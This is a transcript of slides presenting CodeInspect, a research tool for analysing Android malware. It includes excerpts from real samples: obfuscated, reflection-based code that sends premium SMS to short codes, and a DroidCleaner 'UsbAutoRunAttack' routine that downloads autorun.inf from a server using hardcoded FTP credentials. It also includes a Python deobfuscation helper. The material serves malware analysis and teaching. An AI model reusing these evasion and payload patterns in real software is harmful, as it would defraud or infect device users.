
Analyzing Sophisticated Android Malware with CodeInspect (Siegfried Rasthofer) - PowerPoint PPT Presentation



  1. Analyzing Sophisticated Android Malware with CodeInspect Siegfried Rasthofer SECURE SOFTWARE ENGINEERING GROUP

  2. #whoami
     • 3rd year PhD-Student at Secure Software Engineering Group, Darmstadt, Germany (Prof. Dr. Eric Bodden)
     • Research interest:
       • Applied software security on Android
       • Static-/dynamic code analyses
     • Android Security:
       • Found 2 AOSP exploits
       • Korea Threat investigation together with McAfee Research Lab, Intel Security

  3. Malware

  4. The deobfuscated onCreate() shows what the sample does at startup; the obfuscated gdadbjrj() below it is how the same SMS sending appears in the APK: every class and method name is decoded at run time by gdadbjrj.gdadbjrj(...) and resolved through reflection.

```java
// Deobfuscated form of the reflective call below
public void onCreate(android.os.Bundle $param0) {
    sendTextMessage("3353", null, "798657", null, null);
    sendTextMessage("3354", null, "798657", null, null);
    sendTextMessage("3353", null, "798657", null, null);
}

// As found in the sample ("throws Exception" added so the reflection calls compile)
public static boolean gdadbjrj(String paramString1, String paramString2) throws Exception {
    // decodes to Class.forName("android.telephony.SmsManager")
    Class clz = Class.forName(gdadbjrj.gdadbjrj("VRIf3+In9a.aTA3RYnD1BcVRV]af"));
    // decodes to SmsManager.getDefault()
    Object localObject = clz.getMethod(gdadbjrj.gdadbjrj("]a9maFVM.9"),
                                       new Class[0]).invoke(null, new Object[0]);
    // decodes to "sendTextMessage"
    String s = gdadbjrj.gdadbjrj("BaRIta*9caBBV]a");
    // decodes to Class.forName("android.app.PendingIntent")
    Class c = Class.forName(gdadbjrj.gdadbjrj("VRIf3+InVTTnSaRI+R]KR9aR9"));
    // parameter types of sendTextMessage(String, String, String, PendingIntent, PendingIntent);
    // the first three are String.class held in obfuscated static fields
    Class[] arr = new Class[] { nglpsq.cbhgc, nglpsq.cbhgc, glpsq.cbhgc, c, c };
    // sendTextMessage(paramString1, null, paramString2, null, null)
    clz.getMethod(s, arr).invoke(localObject, new Object[] { paramString1, null, paramString2, null, null });
    // the slide omits the return statement
}
```

  5. - Reflections
     - Packers
     - Anti-Decompile
     - Anti-Debug
     - …
     (the reflection-based gdadbjrj() method from slide 4 is repeated on this slide)
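As an added example (not from the slides or the CodeInspect project), the script below recovers the string substitution used by gdadbjrj.gdadbjrj() on slides 4 and 5 from known plaintext. It assumes the encoding is a fixed per-character substitution and that the four literals decode to the SmsManager and PendingIntent names implied by the deobfuscated onCreate() on slide 4; derive_table() checks both assumptions for consistency and raises if they do not hold.

```python
# Added example (not from the slides). Assumption: gdadbjrj.gdadbjrj() is a
# fixed per-character substitution; derive_table() verifies that the four
# literals on the slide are consistent with that assumption and raises if not.

# Encoded literals copied from the slide, paired with the plaintext each must
# decode to (inferred from the deobfuscated onCreate() on slide 4, i.e.
# SmsManager.getDefault().sendTextMessage(String, String, String,
# PendingIntent, PendingIntent)).
KNOWN_PAIRS = [
    ("VRIf3+In9a.aTA3RYnD1BcVRV]af", "android.telephony.SmsManager"),
    ("]a9maFVM.9", "getDefault"),
    ("BaRIta*9caBBV]a", "sendTextMessage"),
    ("VRIf3+InVTTnSaRI+R]KR9aR9", "android.app.PendingIntent"),
]


def derive_table(pairs):
    """Map each encoded character to its plaintext character.

    Raises ValueError if two pairs disagree, which would mean the encoding
    is not a simple substitution and the plaintext guesses must be revisited.
    """
    table = {}
    for enc, plain in pairs:
        if len(enc) != len(plain):
            raise ValueError(f"length mismatch for {enc!r}")
        for e, p in zip(enc, plain):
            if table.setdefault(e, p) != p:
                raise ValueError(f"{e!r} maps to both {table[e]!r} and {p!r}")
    return table


def decode(enc, table):
    """Decode one literal; characters not yet in the table are shown as '?'
    so that partially recovered names stay readable."""
    return "".join(table.get(ch, "?") for ch in enc)


def resolve_reflective_call(table):
    """Render the reflective invocation from slide 4 in plain form."""
    cls = decode("VRIf3+In9a.aTA3RYnD1BcVRV]af", table)
    factory = decode("]a9maFVM.9", table)
    method = decode("BaRIta*9caBBV]a", table)
    return f"{cls}.{factory}().{method}(dest, null, text, null, null)"


if __name__ == "__main__":
    print(resolve_reflective_call(derive_table(KNOWN_PAIRS)))
    # With "getDefault" withheld, the other three pairs still decode most of it.
    print(decode("]a9maFVM.9", derive_table(KNOWN_PAIRS[:1] + KNOWN_PAIRS[2:])))
```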

  6. A new Binary Analysis Framework for Android and Java Bytecode

  7. Soot

  8. Soot Input/Output: .dex, .java, .jimple, .class, .apk
     Soot:
     - Various callgraph algorithms
     - Sophisticated algorithms used in compiler construction
     - Code manipulation
     https://github.com/Sable/soot/wiki

  9. Jimple (Soot)

  10. Jimple (Soot): a method body as CodeInspect shows it, with the slide's labels kept as comments

```jimple
public static boolean UsbAutoRunAttack(android.content.Context $param0)
{
    // Declarations
    java.lang.String $String;

    // Code
    $String = <smart.apps.droidcleaner.Tools: java.lang.String urlServer>;
    ...
    staticinvoke <smart.apps.droidcleaner.Tools: boolean DownloadFile(java.lang.String, java.lang.String, java.lang.String, java.lang.String, android.content.Context)>($String, "autorun.inf", "ftpupper", "thisisshit007", $param0);

    // Return-Statement
    return true;
}
```

  11. CodeInspect (Jimple, Soot)

  12. CodeInspect (Jimple, Soot) features:
      - Syntax Highlighting
      - Code Refactoring
      - Java Source Enhancement
      - Debugger
      - Readable Jimple Code Files
      - Code Manipulation
      - Dataflow Visualizer
      - “Region“ Detection
      - Deobfuscator

  13. Let’s get started…
      1. Import APK
      2. Start Device

  14. Android/BadAccents
      (diagram of the malware's components and triggers: SMS, E-Mail, Install, Activation, Uninstall AV, Fake AV Component, User, Intercept SMS, Intercept Call, Banking Trojan, Send SMS, HTTP, Native Code, File System, Waiting Time, Environment Settings, App Internal, External Event)
      An Investigation of the Android/BadAccents Malware which Exploits a new Android Tapjacking Attack. Siegfried Rasthofer, Irfan Asrar, Stephan Huber, Eric Bodden

  15. Live-Demo: https://goo.gl/LblcR5

  16. Future Steps
      • New Plugins under development
      • Easily add own analyses
      • What would be a useful feature for you?

  17. How do I get this tool?


  19. Siegfried Rasthofer, Secure Software Engineering Group
      Email: siegfried.rasthofer@cased.de
      Blog: http://sse-blog.ec-spride.de
      Website: http://sse.ec-spride.de
      Twitter: @CodeInspect
